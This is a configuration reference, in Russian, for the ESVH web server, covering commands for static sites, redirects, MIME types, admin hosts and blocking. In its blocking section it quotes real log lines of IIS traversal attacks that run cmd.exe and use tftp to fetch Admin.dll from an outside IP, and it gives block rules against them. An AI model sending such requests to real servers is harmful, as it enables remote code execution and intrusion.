Строка команды состоит из полей, разделенных знаком ">". Первое поле всегда содержит код команды, а последующие поля в той же строке - параметры данной команды, количество и интерпретация которых зависит от кода команды. Ниже приводится список поддерживаемых в данный момент системой команд с описанием их параметров. В каждой строке после штатных параметров любой команды вы можете дописать любое количество своих полей с вашими комментариями: интерпретатор команд их просто не заметит, так как ограничивается считыванием из строки только тех параметров, которые требуются спецификацией текущей команды (код которой содержится в первом поле строки).
Следует отметить, что команды создания серверов во втором поле имеют имя создаваемого сервера (например, myserver.com), при этом предполагается, что служба DNS (не имеющая к ESVH никакого отношения) настроена правильно, так что используемое имя хоста разрешается ("резолвится") в тот IP-адрес, который закреплен за тем компьютером, на котором работает данный экземпляр ESVH. Это - обязательное условие, при несоблюдении которого сервер ESVH не сможет выполнять свои функции. (При всем своем желании - ведь на него просто не будут поступать никакие запросы.) Поэтому, при возникновении каких-либо проблем, необходимо сначала с помощью утилиты NSLOOKUP выяснить правильность настройки службы DNS, а уже потом пытаться искать ошибки в самом ESVH.
| Номер параметра | Описание |
|---|---|
| 1 | Код команды - CS |
| 2 | Имя создаваемого сервера - например, mysrv.com |
| 3 | Полное имя каталога (включающее имя диска и весь путь), который отводится для хранения статических html, gif, и т.д. файлов данного сайта |
| 4 | Имя html-файла (без полного пути), с которого начинается просмотр данного сайта (корневая страница) |
Пример. Команда
CS > mysrv.com > c:\pages\mainuser > index.htm >
создает сервер mysrv.com, объекты которого расположены в каталоге c:\pages\mainuser, а корневой страницей является файл index.htm (имеющий, таким образом, полное имя c:\pages\mainuser\index.htm).
| Номер параметра | Описание |
|---|---|
| 1 | Код команды - CR |
| 2 | Имя создаваемого сервера - например, mysrv.com |
| 3 | Имя или IP-адрес машины, на которую должно производиться перенаправление |
| 4 | номер порта, на который должно производиться перенаправление |
| 5 | корневая страница, на которую должно производиться перенаправление (может быть пустым - в этом случае отрабатывается начальная страница "/") |
Пример. Команда
CR > myserv.com > myserv.com > 3080 > >
создает сервер myserv.com путем редиректа на свой же хост, но на службу, находящуюся на порту 3080.
| Номер параметра | Описание |
|---|---|
| 1 | Код команды - CF |
| 2 | Имя создаваемого сервера - например, mysrv.com |
| 3 | Имя или IP-адрес машины, на которую должно производиться перенаправление |
| 4 | номер порта, на который должно производиться перенаправление |
| 5 | корневая страница, на которую должно производиться перенаправление (может быть пустым - в этом случае отрабатывается начальная страница "/") |
| 6 | Заголовок окна, в котором будет изображаться сайт |
Пример. Команда
CF > myserv.com > myserv.com > 3080 > > My best page >
создает сервер myserv.com путем скрытого редиректа на свой же хост, но на службу, находящуюся на порту 3080, при этом окно сайта будет иметь заголовок "My best page".
| Номер параметра | Описание |
|---|---|
| 1 | Код команды - FT |
| 2 | расширение описываемого текущей командой файла - например, gif |
| 3 | MIME-тип описываемого файла - например image/gif |
Файл конфигурации должен содержать столько строк описания различных типов файлов, сколько их реально используется на сайтах, заданных командой CS. Обычно, это как минимум htm, gif и jpg - что требует трех строчек. Пример:
FT > htm > text/html > FT > jpg > image/jpeg > FT > gif > image/gif >
AH > 192.168.3.0 > 255.255.255.0 >
определяет группу хостов с 192.168.3.0 по 192.168.3.255 как группу администраторов сервера, которым разрешено получать страницы статистики.
Если одной командой AH невозможно указать все административные машины, то ее можно повторить несколько раз, указывая последовательно все необходимые области.
Рекомендуется эту команду использовать, например,
для блокировки клиентов, запрашивающих строки
вида:
02.03.2002 21:06:15:804 X.X.X.X www /c/winnt/system32/cmd.exe?/c+dir
02.03.2002 21:06:24:727 X.X.X.X www /c/winnt/system32/cmd.exe?/c+tftp%20-i%20212.9.229.89%20GET%20Admin.dll%20c:\Admin.dll
02.03.2002 21:06:32:939 X.X.X.X www /c/winnt/system32/cmd.exe?/c+tftp%20-i%20212.9.229.89%20GET%20Admin.dll%20d:\Admin.dll
02.03.2002 21:06:41:261 X.X.X.X www /c/winnt/system32/cmd.exe?/c+tftp%20-i%20212.9.229.89%20GET%20Admin.dll%20e:\Admin.dll
(Эти строки взяты с реального лога ESVH, но адрес клиента
из этических соображений уничтожен и приводится как "X.X.X.X".)
Для запрещения такой активности достаточно ввести в список запрещенных серверов имя "www":
BS > www >Команду BS можно повторить несколько раз, если требуется подобным образом "обозначить" не одно, а несколько имен серверов (каждый раз указывая ей новое имя в качестве параметра).
Наиболее частый случай - запрос хакером объектов из каталогов /scripts/, /MSADC/ и /c/winnt/. Для борьбы с этим достаточно подать следующие команды:
BD > /scripts/ > BD > /MSADC/ > BD > /c/winnt/ >При необходимости (периодически просматривая логи) вы можете подобным образом добавить в этот список и другие нежелательные каталоги.
Made by SoftVendor